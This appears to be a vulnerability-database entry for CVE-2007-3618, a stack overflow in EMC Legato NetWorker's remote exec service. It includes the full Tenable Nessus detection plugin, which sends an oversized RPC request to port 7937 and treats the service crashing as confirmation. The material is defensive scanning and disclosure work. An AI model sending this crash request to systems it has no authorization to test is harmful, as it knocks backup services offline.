Vulnerabilities > CVE-2007-3618 - Remote Exec Service Stack Buffer Overflow vulnerability in EMC Legato Networker

047910
CVSS 9.3 - CRITICAL
Attack vector
NETWORK
Attack complexity
MEDIUM
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
emc
critical
nessus
NVD
Published: 2007-08-21
Updated: 2018-10-15

Summary

Stack-based buffer overflow in the NetWorker Remote Exec Service (nsrexecd.exe) in EMC Software NetWorker 7.x.x allows remote attackers to execute arbitrary code via a (1) poll or (2) kill request with a "long invalid subcmd."

Vulnerable Configurations

Part Description Count
Application
Emc
5

Nessus

NASL familyGain a shell remotely
NASL idEMC_NETWORKER_CVE-2007-3618.NASL
descriptionThe EMC Legato Networker application running on the remote host is affected by a stack overflow condition in the Networker Remote Exec Service (nsrexecd.exe), specifically within the sprintf() function, when handling poll or kill requests. An unauthenticated, remote attacker can exploit this, via a crafted request using a long invalid subcmd, to execute arbitrary code.
last seen2020-06-01
modified2020-06-02
plugin id94163
published2016-10-20
reporterThis script is Copyright (C) 2016-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/94163
titleEMC Legato Networker Remote Exec Service Stack Overflow RCE
code
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");

if(description)
{
  script_id(94163);
  script_version("1.6");
  script_cvs_date("Date: 2018/11/15 20:50:22");

  script_cve_id("CVE-2007-3618");
  script_bugtraq_id(25375);
  script_xref(name:"ZDI", value:"ZDI-07-049");
  script_xref(name:"TRA", value:"TRA-2007-06");

  script_name(english:"EMC Legato Networker Remote Exec Service Stack Overflow RCE");
  script_summary(english:"Attempts to terminate the nsrexecd process.");
 
  script_set_attribute(attribute:"synopsis", value:
"A backup application running on the remote host is affected by a
remote code execution vulnerability.");
 script_set_attribute(attribute:"description", value:
"The EMC Legato Networker application running on the remote host is
affected by a stack overflow condition in the Networker Remote Exec
Service (nsrexecd.exe), specifically within the sprintf() function,
when handling poll or kill requests. An unauthenticated, remote
attacker can exploit this, via a crafted request using a long invalid
subcmd, to execute arbitrary code.");
  script_set_attribute(attribute:"solution", value:
"Contact the vendor for an update as referenced in knowledge base
article esg83899.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-07-049/");

  script_set_attribute(attribute:"vuln_publication_date", value:"2007/08/20");
  script_set_attribute(attribute:"patch_publication_date", value:"2007/08/20");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/10/20");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:emc:networker");
  script_end_attributes();

  script_category(ACT_DENIAL);
  script_family(english:"Gain a shell remotely");

  script_copyright(english:"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.");

  script_dependencies("legato_detect.nasl");
  script_require_keys("LegatoNetworker/installed");
  script_require_ports(7937); 

  exit(0);
}

include("audit.inc");
include("misc_func.inc");
include("global_settings.inc");
include("sunrpc_func.inc");
include("dump.inc");

# Check if Networker is running 
if(! get_kb_item("LegatoNetworker/installed"))
  audit(AUDIT_NOT_INST, "The EMC Legato Networker");

# EMC Networker Security Configuration Guide says
# fixed port 7937 is used for nsrexecd
port = 7937;
soc = open_sock_tcp (port);
if (!soc) audit(AUDIT_SOCK_FAIL, port); 

xid = rand();

# Overflow 0x100-byte stack buffer 
attack = crap(data:"A", length:0x200);

data = 
  xdr_long(xid) +                    # ?
  xdr_string("sn_sub_rqst") +        # attr name
  xdr_long(1) +                      # 1 = attr value follows
  xdr_string(attack) +               # first item in attr value list
  xdr_long(0) +                      # 0 = no more value items; 

  xdr_long(1) +                      # 1 = attr follows
  xdr_string("sn_cmd_str") +         # attr name
  xdr_long(1) +                      # 1 =  attr value follows 
  xdr_string("sn_cmd_str_value") +   # first item in attr value list 
  xdr_long(0) +                      # 0 = no more value items

  xdr_long(1) +                      # 1 = attr follows
  xdr_string("sn_timestamp") +       # attr name
  xdr_long(1) +                      # 1 =  attr value follows 
  xdr_string(string(unixtime())) +   # first item in attr value list 
  xdr_long(0) +                      # 0 = no more value items

  xdr_long(0);                       # 0 = no more attr        
      
pkt = rpc_packet(xid: xid, prog:0x5f3e1, proc:5, vers: 1, data: data);

send(socket: soc, data: pkt);
res = rpc_recv(socket: soc);
if(res) 
{
  if("dpoll: invalid subcmd " + substr(attack, 0, 15) >< res)
  {
    audit(AUDIT_HOST_NOT, "affected");
  }
  else
  {
    audit(AUDIT_RESP_BAD, port, 'a nsrexecd RPC call. Reply:\n' + hexdump(ddata:res)); 
  }
}
# No response: nsrexecd likely terminated
else
{
  if(service_is_dead(port: port))
  {
    security_report_v4(port:port, severity: SECURITY_HOLE);
  }
  else
  {
    exit(1, "Unexpected: nsrexecd should terminate but did not."); 
  }
}

Saint

bid25375
descriptionEMC NetWorker Remote Exec service subcmd buffer overflow
idrpc_legatocategory_remoteexecbo,rpc_legatocategory_version
osvdb39744
titleemc_networker_rexec_subcmd
typeremote

Seebug

bulletinFamilyexploit
descriptionBUGTRAQ ID: 25375 CVE(CAN) ID: CVE-2007-3618 EMC Legato NetWorker是一款跨平台的备份和恢复系统。 EMC Legato NetWorker的远程Exec服务(nsrexecd.exe)存在栈溢出漏洞,远程攻击者可能利用此漏洞控制服务器。 如果向poll或kill请求提交了超长的无效subcmd请求的话,就可以在对sprintf()的调用中触发这个溢出,导致执行任意指令。 EMC Legato Networker 7.x.x 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: <a href=\"http://www.emc.com/products/storage_management/navisphere.jsp\" target=\"_blank\">http://www.emc.com/products/storage_management/navisphere.jsp</a>
idSSV:2149
last seen2017-11-19
modified2007-08-21
published2007-08-21
reporterRoot
titleEMC Legato Networker nsrexecd.exe服务远程栈溢出漏洞

References